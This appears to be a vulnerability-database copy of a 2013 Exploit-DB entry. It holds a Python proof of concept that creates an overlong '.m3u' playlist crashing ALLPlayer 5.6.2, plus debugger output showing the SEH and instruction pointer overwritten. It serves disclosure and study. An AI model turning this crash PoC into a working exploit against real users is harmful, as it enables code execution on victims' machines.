Lucene search
+L

ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (PoC)

🗓️ 10 Oct 2013 00:00:00Reported by metacomType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

ALLPlayer Local Buffer Overflow PoC UNICODE. Windows 7 German, ALLPlayer 5.6.2

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2013-7409
3 Mar 201400:00
circl
Check Point Advisories
ALLPlayer M3U File Stack Buffer Overflow (CVE-2013-7409)
3 May 201700:00
checkpoint_advisories
CVE
CVE-2013-7409
30 Oct 201415:00
cve
Cvelist
CVE-2013-7409
30 Oct 201415:00
cvelist
Exploit DB
ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (SEH Unicode)
12 Nov 201300:00
exploitdb
Exploit DB
ALLPlayer 5.7 - '.m3u' UNICODE Buffer Overflow (SEH)
24 Nov 201300:00
exploitdb
Exploit DB
ALLPlayer 5.8.1 - '.m3u' Local Buffer Overflow (SEH)
3 Mar 201400:00
exploitdb
Exploit DB
ALLPlayer - '.m3u' Local Buffer Overflow (Metasploit)
5 Mar 201400:00
exploitdb
Metasploit
ALLPlayer M3U Buffer Overflow
3 Mar 201423:51
metasploit
NVD
CVE-2013-7409
30 Oct 201415:55
nvd
Rows per page
Title: ALLPlayer Local Buffer Overflow PoC UNICODE
Vendor: http://www.allplayer.org/download/allplayer
Date found:     09.10.2013
Date published: 09.10.2013
Platform: windows 7 German
Bug: Buffer Overflow UNICODE
----------------------------

1)VERSIONS AFFECTED
----
ALLPlayer 5.6.2

2)Proof of Concept
------------------

junk = "http://"

buffer="\x41" * 5000

exploit = junk + buffer

try:
    out_file = open("ALLPlayer_Poc.m3u",'w')
    out_file.write(exploit)
    out_file.close()
    print "Exploit file created!"
except:
    print "Error"

3)-(DEBUG)
----------
(1e60.1dec): Access violation - code c0000005 (!!! second chance !!!)
*** WARNING: Unable to verify checksum for C:\Program Files\ALLPlayer\ALLPlayer.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\ALLPlayer\ALLPlayer.exe
eax=00000000 ebx=00000000 ecx=00410041 edx=770d720d esi=00000000 edi=00000000
eip=00410041 esp=000311c4 ebp=000311e4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
ALLPlayer+0x10041:
00410041 008bc0ff2504    add     byte ptr [ebx+425FFC0h],cl ds:0023:0425ffc0=??
0:000> !exchain
---------------
0012e4b0: ALLPlayer+1b7037 (005b7037)
0012e734: ALLPlayer+10041 (00410041)
Invalid exception stack at 00410041

4)Credits
---------
metacom
Contact : metacom27 at gmail.com

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Oct 2013 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 27.5
EPSS0.67936
33